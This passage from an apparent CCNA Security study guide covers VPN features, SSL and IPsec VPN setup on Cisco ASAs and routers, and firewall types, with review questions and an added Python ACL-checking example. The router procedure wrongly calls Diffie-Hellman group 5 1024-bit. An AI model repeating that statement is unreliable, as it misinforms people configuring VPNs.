When using a remote access VPN, two default behaviors can cause issues.
Once a tunnel is operational, all traffic leaving the VPN client must pass through the tunnel.
By default, an ASA will not forward packets back out the same interface on which they were received.
This can cause connectivity issues. In the scenario shown in Figure 11.10, there is a VPN tunnel between R1 and ASA1. Because of these two rules, the Internet PC cannot reach SRV1 (because of rule 2) or resources in site 3 (because of rule 1 forcing the traffic through the end of the tunnel and rule 2 because it cannot reenter that interface).
FIGURE 11.10 The need for hairpinning
To solve this issue, you must enable an option called Enable Traffic Between Two Or More Hosts Connected To The Same Interface. This is commonly referred to as hairpinning. This option is found by navigating in the ASDM to Configuration > Device Setup > Interfaces. This selection must be made on the ASA that terminates the VPN connection. You'll find this selection at the bottom of the Interface page, as shown in Figure 11.11. You should have the interface in question highlighted when you make the selection.
FIGURE 11.11 Hairpin configuration
Split Tunneling
Another advanced option you can enable is called split tunneling. When enabled, it allows a user to have the tunnel up and use the same interface to access the Internet without traversing the tunnel. When this is done, an ACL is used to determine the traffic that goes through the tunnel (all traffic except for Internet traffic) and the traffic that does not go through the tunnel (Internet).
To make this possible, follow these steps:
1. Navigate in the ASDM to Configuration > Remote Access VPN > Network (Client) Access > Group Policies. The policies that have been defined will appear. Select the policy that was created when you set up the remote access VPN connection and select Edit.
2. In the Edit Internal Group Policy window, navigate to Advanced > Split Tunneling. Deselect the Inherit box for the Network List field. This prevents the policy from inheriting the current policy. Next click the Management button to the right of the field. The ACL Manager window will appear.
3. Select the Standard ACL tab and then select Add > Add ACL.
4. In the Add ACL box, give this ACL a name, such as RA-split-tunnel.
5. Click OK and then highlight the ACL and select Add > Add ACE. Here add the network ID of the destination LAN and select Permit.
That defines the traffic to go through the tunnel. All undefined traffic will not go through the tunnel and will therefore not be impacted by the two rules discussed earlier. From a conceptual view, what will now be allowed is shown in Figure 11.12.
FIGURE 11.12 Split tunneling
Always-on VPN
When the Cisco AnyConnect client is used to create a VPN connection, it is possible to have the connection brought up any time the user logs on to his device. This is called Always-On VPN.
To enable Always-On VPN, you must first enable Trusted Network Detection in a profile that applies to the user. This feature enables the device to know when it is connected to the corporate LAN and when it is not. Then you specify that when not connected to the corporate LAN, the VPN connection should be started.
1. In the ASDM, navigate to Configuration > Remote Access VPN > Network > AnyConnect Client Profile. In this configuration mode, you can add a new AnyConnect profile. Click the Add button and choose a profile name and profile location. You can also apply this profile to a Group Policy, but this could also be added later with the command. Click OK and Apply.
2. Select the new profile and then on the left select Preferences (Part 2). You will see the screen shown in Figure 11.13.
3. Check Automatic VPN Policy and select Disconnect on Trusted Network Policy and Connect on Untrusted Network Policy. You must also enter the DNS domain name for your trusted network, and you should also add DNS servers.
FIGURE 11.13 Preferences (Part 2) window
NAT Traversal
As ESP does not utilize the concept of source and destination ports, NAT has difficulty operating when IPsec traffic arrives at the NAT device. NAT traversal encapsulates IPsec within UDP, providing the requisite ports for NAT.
Configuring NAT traversal, or NAT-T, is done with a simple check box found in the Global Parameters section of IKE in the ASDM. Navigate to Configuration > VPN > IKE > Global Parameters in the ASDM.
Select the interface in the Enable IKE box and then select Enable IPsec over NAT-T, as shown in Figure 11.14.
FIGURE 11.14 NAT traversal
Summary
In this chapter, you learned about IPsec and the security services it provides. The chapter discussed the components of IPsec such as ISAKMP, IKE, AH, and ESP. You also learned how to use hairpinning to allow traffic between two hosts to connect to the same VPN interface. Finally, split tunneling and its benefits were discussed.
Exam Essentials
Identify the security services provided by IPsec. They include confidentiality, integrity, origin authentication, anti-replay, and key management.
List the components and delivery modes of IPsec. These include ISAKMP, IKE, AH, and ESP. Delivery modes include transport and tunnel mode.
Describe the operation of hairpinning. Hairpinning can be used to allow traffic between two hosts to connect to the same VPN interface. It is required because of the default rule that an ASA will not forward packets back out the same interface on which they were received.
Describe the operation of split tunneling. When enabled, it allows a user to have the tunnel up and use the same interface to access the Internet without traversing the tunnel.
Review Questions
1. Which IPsec component provides confidentiality?
A. AH
B. IKE
C. ESP
D. ISAKMP
2. Which IPsec component provides integrity?
A. HMAC
B. IKE
C. ESP
D. ISAKMP
3. Which IPsec component provides only data integrity, origin authentication, and anti-replay protection?
A. HMAC
B. AH
C. ESP
D. ISAKMP
4. Which IPsec component provides key exchange?
A. HMAC
B. AH
C. Diffie-Hellman
D. ISAKMP
5. What is the minimum key length for Suite B algorithms?
A. 64-bit
B. 80-bit
C. 128-bit
D. 160-bit
6. What hashing algorithm is required by the Suite B standard?
A. MD5
B. SHA-1
C. SHA-2
D. AES
7. Which of the following is not a function of IKE?
A. Automatic key generation
B. Automatic key refresh
C. Key exchange
D. Negotiation of the security association (SA)
8. Which of the following does not occur in phase 1 of IKE?
A. Negotiates the policy sets.
B. Sets up a secure channel.
C. Authenticates the peer devices to one another.
D. The IPsec transform set is negotiated.
9. Which of the following is true of the Main and Aggressive IKE modes?
A. Main mode uses two messages, and Aggressive mode uses three.
B. Main mode uses three messages, and Aggressive mode uses two.
C. Both modes use three messages.
D. Both modes use two messages.
10. Which of the following is not performed during IKE phase 2?
A. Periodic renegotiation of the SA.
B. The SA is established.
C. The IPsec transform set is negotiated.
D. The Diffie-Hellman protocol is used to generate a shared symmetric key.
11. Which of the following is not true of IKEv2 when compared with IKEv1?
A. More transactions that result in decreased speed
B. Stronger security through denial-of-service protection
C. Supports EAP as an authentication method
D. Incorporates extensions such as NAT traversal and dead peer detection
12. When using AH in transport mode, which parts of the packet are authenticated?
A. Only the header
B. Only the payload
C. Header and payload
D. None
13. When using ESP in tunnel mode, which parts of the packet are encrypted?
A. Only the header
B. Only the payload
C. Header and payload
D. None
14. Which of the following is not true of IPsec in IPv6 and IPv4?
A. IPsec is required in IPv6.
B. In IPv4, AH and ESP are implemented as IP protocol headers.
C. In IPv6, extension headers are used to implement IPsec.
D. In IPv6, the extension header lies between the IPv6 header and the payload.
15. Which of the following is true?
A. By default, an ASA will not forward packets back out the same interface in which it was received.
B. By default, an ASA will forward packets back out the same interface in which it was received.
C. Once a tunnel is operational, all traffic leaving the VPN client need not pass through the tunnel.
D. In IPv4, AH and ESP are implemented as IP protocol headers.
16. Which of the following features can be used to allow traffic to re-enter the end of an IPsec tunnel?
A. Split horizon
B. Hairpinning
C. Split tunnel
D. Poison reverse
17. Which feature, when enabled, allows a user to have the tunnel up and use the same interface to access the Internet without traversing the tunnel?
A. Split horizon
B. Hairpinning
C. Split tunnel
D. Poison reverse
18. Which additional feature must be enabled to use Always-on VPN?
A. MDM
B. Trusted network detection
C. Hairpinning
D. STP
19. What feature encapsulates IPsec within UDP?
A. NAT-T
B. DNSSec
C. Split tunnel
D. Trusted network detection
20. What protocol number is used for ESP?
A. 48
B. 49
C. 50
D. 51
Chapter 12
Configuring VPNs
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
3.2 Remote access VPN
Implement basic clientless SSL VPN using ASDM
Verify clientless connection
Implement basic AnyConnect SSL VPN using ASDM
Verify AnyConnect connection
Identify endpoint posture assessment
3.3 Site-to-site VPN
Implement an IPsec site-to-site VPN with preshared key authentication on Cisco routers and ASA firewalls
Verify an IPsec site-to-site VPN
Virtual private network (VPN) connections can be configured in two basic forms, as remote access VPNs or as site-to-site VPNs. While one is designed to provide a secure remote access connection for a telecommuter or remote user, the other is designed to provide a secure tunnel to carry all traffic between two locations. In this chapter, you’ll learn how to configure and verify both VPN types. Moreover, you’ll learn about two different ways to implement the remote access VPN.
In this chapter, you will learn the following:
How to configure and verify a clientless SSL VPN using ASDM
How to implement and verify an AnyConnect SSL VPN using ASDM
How a Cisco endpoint posture assessment can help protect the network from malware and other types of attacks
How to implement and verify an IPsec site-to-site VPN with preshared key authentication on Cisco routers and ASA firewalls
Configuring Remote Access VPNs
Cisco remote access VPNs can be deployed either by installing the AnyConnect client on the user’s device or by configuring the clientless SSL VPN solution, in which no client is required on the user device. Additionally, you can use a Cisco clientless connection to deploy the AnyConnect client to the user device. Finally, when combined with a Cisco endpoint posture assessment, the security posture of the device can be verified before allowing the remote device to access the network, helping to protect the network from malware and other threats. In this section, you’ll learn how to implement these two types of remote access solutions and examine the benefits of utilizing a Cisco endpoint posture assessment.
Basic Clientless SSL VPN Using ASDM
While the clientless SSL VPN can be deployed on the Cisco Adaptive Security Appliance using the command line, it is simpler to do so using the Cisco Adaptive Security Device Manager (ASDM). Before diving into the configuration, it is helpful to look at the protocol that provides confidentiality, integrity, and authentication services for the connection.
SSL/TLS
Transport Layer Security (TLS) is used to provide security services for both the clientless SSL VPN and the AnyConnect VPN. While its predecessor is Secure Sockets Layer (SSL), the term SSL VPN has persisted and is still used to describe the connection even though most modern systems use TLS. These protocols use public key cryptography and digital certificates in their operation. While certificates can be deployed on both the client and the server to enable mutual authentication, in most cases a certificate is deployed only on the server, because that secures the connection as well as deploying certificates on both ends does.
SSL/TLS has a great deal of flexibility regarding the encryption algorithms, hashing algorithms, authentication mechanisms, and key management protocols that can be used. Figure 12.1 depicts the choices available for each of these components.
FIGURE 12.1 Supported SSL/TLS algorithms
It is also helpful to understand the process that occurs when one of these connections is established between the client and the server. The steps that occur are as follows:
1. The client initiates the process by starting the exchange of hello packets between the client and the VPN gateway (the ASA). This step allows the two to negotiate and agree on the encryption algorithms, hashing algorithms, authentication mechanisms, and key management protocols to be used.
2. The server transmits its certificate to the client (which will include its public key). If the RSA key exchange algorithm is in use, the client sends a premaster key to the server using the public key of the server to protect the transmission.
3. If mutual authentication is required, the client then sends its certificate to the server, a session key is calculated, and the cipher suite is activated. Integrity will be provided by the selected hashing algorithm (MD5 or SHA-1), and encryption will be provided by the selected cipher (RC4, 3DES, AES, or IDEA).
4. Once the session keys are exchanged, the data transfer begins. When the traffic gets beyond the ASA, the information will be in clear text, but it will be encrypted between the client and the ASA.
Configuration
When using the Cisco clientless SSL VPN, the remote device uses the browser to connect to an SSL-enabled website on the ASA or on a Cisco router. Once the security appliance has authenticated the user, the server certificate is used to establish the SSL tunnel. Then the security appliance presents the user with a web portal that contains a link to the internal resources that have been made available.
From a high level, the steps to be completed to configure the Cisco clientless SSL VPN are as follows:
1. Enable clientless SSL VPN traffic termination on an ASA interface.
2. Configure clientless SSL server authentication by provisioning an identity certificate and attaching it to the interface.
3. Configure user authentication, which comprises three subtasks.
a. Create accounts for the VPN users.
b. Configure a group policy for the VPN users, specifying in the policy clientless SSL VPN as the tunneling protocol.
c. Create a connection profile for the VPN users and connect the policy to the profile.
4. Set up bookmarks that will appear when the users connect to the web portal.
Configuring Clientless SSL VPN
In this procedure, you will configure a clientless SSL VPN using the local user database of the ASA.
1. In the ASDM, navigate to Wizards ➢ VPN Wizards ➢ Clientless SSL VPN Wizard.
2. On the Step 1 page of the wizard, provide an informational description for the connection and click Next.
3. When the Step 2 page appears, give the connection profile a name in the Connection Profile Name box. Just below that, select the interface that will host the connection and click Next.
4. In the Step 3 dialog box, select the Authenticate Using The Local User Database radio button. Click the Add button and create a user account for the user, specifying both a username and a password. Then click Next.
5. On the Step 4 page of the wizard, create a group policy for the user by selecting the Create A New Group Policy radio button and give the policy a name. Then click Next.
6. In the Step 5 dialog box, you will create a bookmark list and then add bookmarks to the list. Just to the right of the Bookmarks List field, click the Manage button. The Configure GUI Customization dialog box appears. Click the Add button, and when the Add Bookmark List dialog box appears, give the bookmark list a name. Then click the Add button in this dialog box. When the Select Bookmark Type dialog box appears, accept the URL With The GET Or POST Method option and click OK.
7. Now you will add a bookmark for a web resource you will make available. In the Add Bookmark dialog box, give the bookmark a name, select the HTTP protocol, and enter the IP address of the server providing this resource. When you have added all the bookmarks you need on this page, click OK.
8. On the Configure GUI Customization page, click OK.
9. In the Step 5 window, ensure that your bookmark list is selected and click Next.
10. Review the summary Page 6 window and click Finish.
Verify a Clientless Connection
Naturally, the most effective way to verify the proper configuration of the clientless SSL VPN is to ensure that a connection can be made. This involves the following:
1. Connecting to the site URL
2. Specifying the group configured for the user
3. Entering the name and the password for the user
4. Verifying that the bookmarks appear when authentication is complete
5. Testing the bookmarks to ensure that they connect to the correct resource
Basic AnyConnect SSL VPN Using ASDM
To utilize a Cisco AnyConnect SSL VPN, a VPN client called the AnyConnect client must be installed on the user device. When configuring the connection, you will make this client available to be downloaded and installed on the user device the first time the user connects, making a manual installation of the client unnecessary.
From a high level, the steps to be completed to configure the Cisco AnyConnect SSL VPN are as follows:
1. Create a connection profile and attach it to the external interface of the ASA.
2. Generate a self-signed certificate for the ASA (or use an existing one if it exists already).
3. Make the AnyConnect client available for download when the user connects.
4. Create an account and password for the user on the ASA.
5. Create a pool of IP addresses that can be issued to AnyConnect clients.
6. Exempt the internal network from the NAT process.
7. Select to allow the web launch of the AnyConnect client.
8. Create a group policy for the remote access connection and assign it to the user.
Configuring AnyConnect SSL VPN
In this procedure, you will configure an AnyConnect SSL VPN using the local user database of the ASA.
1. In the ASDM window, navigate to Wizards ➢ VPN Wizards ➢ AnyConnect VPN Wizard. When the wizard opens, click Next on the first page.
2. Next, on the Connection Profile Identification page, enter a profile name for the connection profile and ensure that VPN Access Interface is set to the Internet interface.
3. On the VPN Protocol page, select SSL. In the Device Certificate With RSA Key drop-down box, select an existing certificate or click Manage and generate a certificate.
4. On the Client Images page, click the Add button. In the Add AnyConnect Client Image window, click the Upload button. Browse to the location of the AnyConnect image file and select the .pkg version. Verify the selection by clicking Select, Upload File, OK, and OK.
5. On the Authentication Methods page, create a username and password for the user.
6. On the Client Address Assignment page, click New and create a scope of IP addresses to be available to the AnyConnect clients.
7. On the Network Resolution page, enter the IP address of a DNS server.
8. On the NAT Exempt page, if the ASA is also performing NAT, select the Exempt VPN Traffic From Network Address Translation check box. Click Next.
9. For the AnyConnect Client Deployment step, select Allow Web Launch.
10. On the Summary page, review your settings and click Finish.
Verify an AnyConnect Connection
Again, the most effective way to verify the proper configuration of the AnyConnect SSL VPN is to ensure that a connection can be made and that the client installs and allows full VPN access. This involves the following:
1. Connecting to the site URL
2. Specifying the group configured for the user
3. Entering the name and the password for the user
4. Ensuring that the user is offered the option to install the AnyConnect client
5. Ensuring the client successfully installs
6. Ensuring that the user is given full tunnel VPN access to the network
Endpoint Posture Assessment
The Cisco AnyConnect client also includes modules that can enhance its capabilities. Two of these modules are the ASA Posture module and the ISE Posture module. Both modules offer the ability to assess an endpoint’s compliance with requirements regarding operating system version, antivirus updates, and other security-related issues through an endpoint posture assessment. This gives you the ability to verify the security posture before allowing the device access to the network.
While the ASA module performs a server-side assessment, ISE sends the policy requirements to the endpoint, where the assessment then occurs. The ASA module collects the health information in the form of attributes and sends them to the ASA, where the assessment occurs.
Both systems can deny access to the endpoints that fail the assessment, and both offer remediation capabilities as well. Remediation with the ASA module is limited to working with the software present on the endpoint, meaning it can enable, disable, or update that software. ISE quarantines the device and directs it to servers that remediate the issues. Only then is the endpoint allowed full access to the network.
Configuring Site-to-Site VPNs
Site-to-site VPN connections have an endpoint in one location or office and another endpoint in another office. While both SSL and IPsec can be used for these VPNs, this section will focus on the IPsec site-to-site VPN. Also, while the authentication can be done with other means, we will focus on the use of a preshared key.
Implement an IPsec Site-to-Site VPN with Preshared Key Authentication
A Cisco IPsec site-to-site VPN can be configured on an ASA using the ASDM, or it can be set up on a Cisco router. You will learn about both methods in the following sections. Following this, you will learn how to verify the configuration. For both processes, the high-level steps required are as follows:
1. Ensure that all ACLs are compatible with IPsec.
2. Configure an ISAKMP policy that contains the ISAKMP parameters.
3. Define the IPsec transform set, which includes the encryption and integrity algorithms.
4. Create a crypto ACL that defines the traffic types to be sent and protected through the tunnel.
5. Create a crypto map that defines the peers, applies the parameters of the crypto ACL to them, and applies the crypto ACL to the interface.
Cisco Routers
Here you will learn how to do the implementation.
Implement an IPsec Site-to-Site VPN with Preshared Key Authentication with a Cisco Router
In this procedure, you will implement an IPsec site-to-site VPN with preshared key authentication with a Cisco router.
1. Execute the show run command and locate the section for the interface where the connection will be configured. Examine the ACL applied to that interface, if one exists. Ensure that the following permit statements are present and, if not present, apply them to the list, taking care to sequence them in the proper location:
permit ahp host <ip address of the peer router> host <ip address of the local router>
permit esp host <ip address of the peer router> host <ip address of the local router>
permit udp host <ip address of the peer router> host <ip address of the local router> eq isakmp
permit udp host <ip address of the peer router> host <ip address of the local router> eq non500-isakmp
2. Now define an ISAKMP policy and number it 111. When you are done, the prompt will change, and the next commands will be part of the policy.
Router70(config)#crypto isakmp policy 111
3. Now complete the policy, specifying the following settings:
Authentication: preshared key
Encryption algorithm: 128-bit AES
1024-bit Diffie-Hellman for key exchange (specify group 5)
SHA algorithm for integrity
Security Association lifetime: 1 day (86400 seconds)
Use the following commands for this:
Router70(config-isakmp)#authentication pre-share
Router70(config-isakmp)#encryption aes 128
Router70(config-isakmp)#group 5
Router70(config-isakmp)#hash sha
Router70(config-isakmp)#lifetime 86400
Ensure that the peer router has at least one ISAKMP policy that includes these settings. Remember that policy names and PSKs are case-sensitive.
4. Specify the ISAKMP key and the IP address of the peer router at the global configuration prompt. In this case, the peer is at 102.168.5.3, and the PSK is MAC321.
Router70(config)#crypto isakmp key MAC321 address 102.168.5.3
5. Configure the IPsec transform set by specifying the following:
Transform set name: AES_SHA
Mechanism for payload authentication: ESP HMAC
Mechanism for payload encryption: ESP
IPsec mode: tunnel (defaults to tunnel)
Use the following command for this:
Router70(config)#crypto ipsec transform-set AES_SHA esp-aes esp-sha-hmac
6. Create a crypto ACL (an extended access list) that specifies the inbound and outbound traffic that IPsec should protect. In this case, protect all TCP traffic. It will be specified using the source network ID and the destination network ID with wildcard masks. The source network is 10.0.2.0/24, and the destination is 10.0.1.0/24.
Router70(config)#access-list 110 permit tcp 10.0.2.0 0.0.0.255 10.0.1.0 0.0.0.255
7. Create a crypto map that specifies the ACL number 110, the transform set name, and the IPsec peer. Use a map name of mymap and set the SA lifetime to 86400 seconds.
Router70(config)#crypto map mymap 10 ipsec-isakmp
Router70(config-crypto-map)#match address 110
Router70(config-crypto-map)#set peer 102.168.5.3
Router70(config-crypto-map)#set transform-set AES_SHA
Router70(config-crypto-map)#set security-association lifetime seconds 86400
8. Apply the crypto map to the interface Serial 0/1. The crypto map command is entered at the interface configuration prompt.
Router70(config)#int s0/1
Router70(config-if)#crypto map mymap
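Step 1 of the procedure is the one most often skipped: if the interface ACL does not permit AH (IP protocol 51), ESP (IP protocol 50), UDP 500 (ISAKMP) and UDP 4500 (NAT-T) between the peers, or permits them below an earlier deny, the tunnel never negotiates. The following Python is an added example, not code or configuration from the study guide; it parses the host/host ACL lines in the form the page uses and reports which of the four required permits the ACL would not honor, taking sequencing into account. The sample ACL and the local router address 102.168.5.4 are constructed; only the peer address 102.168.5.3 comes from the page.

```python
"""Check that an interface ACL permits the IPsec and ISAKMP traffic a
site-to-site VPN needs, as in step 1 of the router procedure.

Added example, not from the study guide. Assumptions: ACL lines use the IOS
extended syntax subset shown on the page (host/host entries with an optional
'eq <port>'); the sample ACL and local address 102.168.5.4 are constructed.
"""
from dataclasses import dataclass
from typing import List, Optional

AH_PROTO = 51        # "permit ahp ..."  (AH is IP protocol 51)
ESP_PROTO = 50       # "permit esp ..."  (ESP is IP protocol 50)
UDP_PROTO = 17
ISAKMP_PORT = 500    # "eq isakmp"
NAT_T_PORT = 4500    # "eq non500-isakmp" (NAT-T: IPsec encapsulated in UDP)

PROTO_NAMES = {"ip": 0, "tcp": 6, "udp": UDP_PROTO, "esp": ESP_PROTO, "ahp": AH_PROTO}
PORT_NAMES = {"isakmp": ISAKMP_PORT, "non500-isakmp": NAT_T_PORT}


@dataclass(frozen=True)
class AclEntry:
    action: str           # "permit" or "deny"
    proto: int            # IP protocol number; 0 means any ("ip")
    src: str
    dst: str
    port: Optional[int]   # destination port; None means any port


def parse_acl_line(line: str) -> AclEntry:
    """Parse lines such as 'permit udp host A host B eq isakmp'."""
    tok = line.split()
    if len(tok) < 6 or tok[2] != "host" or tok[4] != "host":
        raise ValueError(f"only host/host entries are supported: {line!r}")
    action, proto, src, dst = tok[0], PROTO_NAMES[tok[1]], tok[3], tok[5]
    port = None
    if len(tok) > 6:
        if tok[6] != "eq" or len(tok) != 8:
            raise ValueError(f"unsupported port clause: {line!r}")
        port = PORT_NAMES[tok[7]] if tok[7] in PORT_NAMES else int(tok[7])
    return AclEntry(action, proto, src, dst, port)


def required_entries(peer: str, local: str) -> List[AclEntry]:
    """The four permits the procedure requires on the interface ACL."""
    return [
        AclEntry("permit", AH_PROTO, peer, local, None),
        AclEntry("permit", ESP_PROTO, peer, local, None),
        AclEntry("permit", UDP_PROTO, peer, local, ISAKMP_PORT),
        AclEntry("permit", UDP_PROTO, peer, local, NAT_T_PORT),
    ]


def first_match(entries: List[AclEntry], need: AclEntry) -> Optional[AclEntry]:
    """ACLs are evaluated top down: the first entry covering the traffic decides."""
    for e in entries:
        proto_ok = e.proto in (0, need.proto)
        addr_ok = (e.src, e.dst) == (need.src, need.dst)
        port_ok = e.port is None or e.port == need.port
        if proto_ok and addr_ok and port_ok:
            return e
    return None  # implicit deny at the end of every ACL


def missing_ipsec_permits(acl_lines: List[str], peer: str, local: str) -> List[AclEntry]:
    """Return the required entries the ACL would not permit (sequencing matters)."""
    entries = [parse_acl_line(l) for l in acl_lines if l.strip()]
    missing = []
    for need in required_entries(peer, local):
        hit = first_match(entries, need)
        if hit is None or hit.action != "permit":
            missing.append(need)
    return missing


# Constructed sample: peer 102.168.5.3 (from the page), local router 102.168.5.4 (assumed).
PEER, LOCAL = "102.168.5.3", "102.168.5.4"
SAMPLE_ACL = [
    f"permit esp host {PEER} host {LOCAL}",
    f"permit udp host {PEER} host {LOCAL} eq isakmp",
    f"deny udp host {PEER} host {LOCAL} eq non500-isakmp",
]

if __name__ == "__main__":
    # For the sample ACL this reports the AH entry and the NAT-T entry (denied above).
    for m in missing_ipsec_permits(SAMPLE_ACL, PEER, LOCAL):
        port = "" if m.port is None else f" eq {m.port}"
        print(f"missing: permit {m.proto} host {m.src} host {m.dst}{port}")
```

Appending the missing permits at the end of the list does not help the NAT-T entry, because the earlier deny still matches first; they must be inserted above it, which is the sequencing point step 1 makes.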
ASA Firewalls
When configuring a site-to-site VPN between two ASA firewalls, you will in most cases make use of the ASDM. Therefore, you will learn the procedure for doing this.
Implement an IPsec Site-to-Site VPN with Preshared Key Authentication on ASA with the ASDM
In this procedure, you will implement an IPsec site-to-site VPN with preshared key authentication on ASA.
1. In the ASDM, navigate to Wizards ➢ VPN Wizards ➢ Site-to-Site VPN Wizard. On the Introduction screen, click Next.
2. On the Peer Device Identification screen, enter the IP address of the peer ASA device and select the external interface leading to the peer. Click Next.
3. On the Traffic To Protect screen, enter the network ID of the local network in the Local Network field and the network ID of the remote network in the Remote Network field. Click Next.
4. In the Security panel, select Simple Configuration and enter the preshared key for the connection.
5. On the NAT Exempt page, if the ASA is also performing NAT, select the Exempt VPN Traffic From Network Address Translation check box. Then click Next.
6. In the Summary window, verify your selections. When satisfied, select Finish.
Verify an IPsec Site-to-Site VPN
Regardless of the method used to set up the site-to-site VPN, the verification method is the same. You need to generate interesting traffic from one of the sites to the other and verify that the connection is functional. In these two examples, all traffic is interesting traffic, so all you need do is ping from a device in one location to a device in the other location. If the ping succeeds, the connection is working. If the first ping fails, try again and keep in mind that it takes some time to negotiate the security of the SA.
Summary
In this chapter, you learned the value of the Cisco clientless SSL VPN and the steps required to configure it. The chapter also discussed an alternative to this VPN type, the Cisco AnyConnect SSL VPN, which provides a full-tunnel experience but requires client software on the user’s device. You also learned about modules in the Cisco AnyConnect client that can provide endpoint posture assessment. Finally, the chapter covered how to implement an IPsec site-to-site VPN with preshared key authentication.
Exam Essentials
Identify the steps to be completed to configure the Cisco clientless SSL VPN. These steps are first to enable clientless SSL VPN traffic termination on an ASA interface and then to configure clientless SSL server authentication by provisioning an identity certificate and attaching it to the interface. Next configure user authentication, and finally create bookmarks for the links to the resources that will appear when the users connect to the web portal.
List the steps to be completed to configure the Cisco AnyConnect SSL VPN. These steps include the following: Create a connection profile and attach it to the external interface of the ASA. Generate a self-signed certificate for the ASA (or use an existing one if it exists already). Generate an identity certificate for the ASA and attach it to the key pair. Make the AnyConnect client available for download when the user connects. Create an account and password for the user on the ASA. Create a pool of IP addresses that can be issued to AnyConnect clients. Exempt the internal network from the NAT process. Select to allow the web launch of the AnyConnect client. Create a group policy for the remote access connection and assign it to the user.
Describe the components that provide endpoint posture assessment. The Cisco AnyConnect client also includes modules that can enhance its capabilities. Two of these modules are the ASA Posture module and the ISE Posture module. Both modules offer the ability to assess an endpoint’s compliance with requirements regarding operating system version, antivirus updates, and other security-related issues. This gives you the ability to verify the security posture before giving the device access to the network.
List the steps to implement an IPsec site-to-site VPN with preshared key authentication. These steps include the following: Ensure that all ACLs are compatible with IPsec. Configure an ISAKMP policy that contains the ISAKMP parameters. Define the IPsec transform set, which includes the encryption and integrity algorithms. Create a crypto ACL that defines the traffic types to be sent and protected through the tunnel. Create a crypto map that defines the peers, applies the parameters of the crypto ACL to them, and applies the crypto ACL to the interface.
Review Questions
1. Which confidentiality algorithm is not supported for an SSL/TLS VPN?
A. DES
B. 3DES
C. AES
D. RC4
2. In an SSL/TLS VPN, what function can the DSA algorithm be used for?
A. Authentication
B. Integrity
C. Confidentiality
D. Key management
3. In the SSL connection process, which step occurs last?
A. Session keys are exchanged.
B. The server transmits its certificate to the client.
C. The client sends hello packets.
D. The client sends its certificate to the server.
4. Which of the following is not a subtask of configuring user authentication for a Cisco clientless SSL VPN connection?
A. Create a connection profile for the VPN users
B. Configure a group policy for the VPN users
C. Create accounts for the VPN users
D. Create bookmarks for the links to the resources
5. Which of the following is false regarding an endpoint posture assessment?
A. The ISE module performs a server-side assessment.
B. Both ISE and ASA posture modules offer the ability to assess an endpoint’s compliance.
C. Both systems can deny access to the endpoints that fail the assessment, and both offer remediation capabilities.
D. The ISE quarantines a noncompliant device and directs it to servers that remediate the issues.
6. When implementing an IPsec site-to-site VPN, in which step are the encryption and integrity algorithms defined?
A. Creating a crypto map
B. Creating a crypto ACL
C. Defining the IPsec transform set
D. Specifying the ISAKMP key
7. Which of the following commands specifies the details of the key exchange algorithm?
A. Router70(config-isakmp)#lifetime 86400
B. Router70(config-isakmp)#encryption aes 128
C. Router70(config-isakmp)#group 5
D. Router70(config-isakmp)#authentication pre-share
8. In the following command, what does the number 10 represent?
Router70(config)#crypto map mymap 10 ipsec-isakmp
A. Sequence number
B. ACL number
C. Map name
D. SA lifetime
9. Which of the following is possible when certificates are present on both the client and the server?
A. Hairpinning
B. Mutual authentication
C. Online certificate verification
D. Split tunneling
10. Which of the following is not a possible authentication mechanism available in the SSL VPN?
A. RSA
B. CHAP
C. DSA
D. EC
11. Which of the following will be included in the certificate the server presents to the client?
A. PSK
B. Private key
C. Transform set
D. Public key
12. What step makes secure data exchange possible?
A. Exchange of hellos
B. Exchange of session keys
C. Exchange of certificates
D. Exchange of credentials
13. In which type of VPN does the user use the browser to connect to an SSL-enabled website?
A. AnyConnect
B. Clientless
C. IPsec with preshared key
D. IPsec site-to-site
14. What is the function of the MD5 algorithm in the SSL VPN process?
A. Authentication
B. Integrity
C. Confidentiality
D. Key exchange
15. Which of the following defines the traffic types to be sent and protected through the tunnel?
A. Crypto map
B. Crypto ACL
C. IPsec transform set
D. ISAKMP key
16. What does the following command control?
Router70(config-isakmp)#lifetime 86400
A. Authentication timeout
B. SA lifetime
C. PSK lifetime
D. Inactivity timer
17. In the following command, what does AES_SHA define?
Router70(config)#crypto ipsec transform-set AES_SHA esp-aes esp-sha-hmac
A. The name of the transform set
B. The mechanism for the payload authentication
C. The mechanism for the payload encryption
D. The tunnel mode
18. Which of the following is not a supported key management algorithm in an SSL VPN?
A. MD5
B. Quantum
C. DH
D. ECC
19. What VPN method requires software on the user device?
A. IPsec site-to-site
B. AnyConnect
C. Clientless
D. IPsec with PSK
20. What statement is false regarding endpoint posture assessment?
A. The ISE module quarantines a noncompliant device and directs it to servers that remediate the issues.
B. The ISE module is limited to working with the software present on the endpoint.
C. Both systems can deny access to the endpoints that fail the assessment.
D. The ASA module performs a server-side assessment.
Chapter 13
Understanding Firewalls
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
5.1 Describe operational strengths and weaknesses of the different firewall technologies
Proxy firewalls
Application firewall
Personal firewall
5.2 Compare stateful vs. stateless firewalls
Operations
Function of the state table
Firewalls are part of the foundation of security in a network. They protect the network perimeter and control access between security zones within your networks. You will also typically deploy firewalls in layers, meaning you will place firewalls on each device. Firewalls differ in the way they examine the traffic they are designed to control and in the effect they have on network performance.
In this chapter, you will learn the following:
The operational strengths and weaknesses of the different firewall technologies
The functions of stateful and stateless firewalls
Understanding Firewall Technologies
Firewalls come with a range of abilities and go about their jobs in different ways depending on the job for which they were designed. They can differ in the OSI layer on which they operate and in the types of actions they can take and the attack types they can mitigate. In this section, you’ll learn about a variety of these devices. In the section following this one, you’ll look at one firewall capability that deserves a section all its own.
Packet Filtering
Packet filtering firewalls are the least detrimental to throughput because they only inspect the header of the packet for allowed IP addresses or port numbers. Although even performing this function will slow traffic, it involves only looking at the beginning of the packet and making a quick allow or disallow decision.
Although packet filtering firewalls serve an important function, they cannot prevent many attack types. They cannot prevent IP spoofing, attacks that are specific to an application, attacks that depend on packet fragmentation, or attacks that take advantage of the TCP handshake. More advanced inspection firewall types are required to stop these attacks.
Proxy Firewalls
Proxy firewalls stand between each connection from the outside to the inside and make the connection on behalf of the endpoints. Therefore, there is no direct connection. The proxy firewall acts as a relay between the two endpoints. Proxy firewalls can operate at two different layers of the OSI model. Both are discussed shortly.
Circuit-level proxies operate at the Session layer (layer 5) of the OSI model. They make decisions based on the protocol header and Session layer information. Because they do not do deep packet inspection (at layer 7, or the Application layer), they are considered application-independent and can be used for wide ranges of layer 7 protocol types.
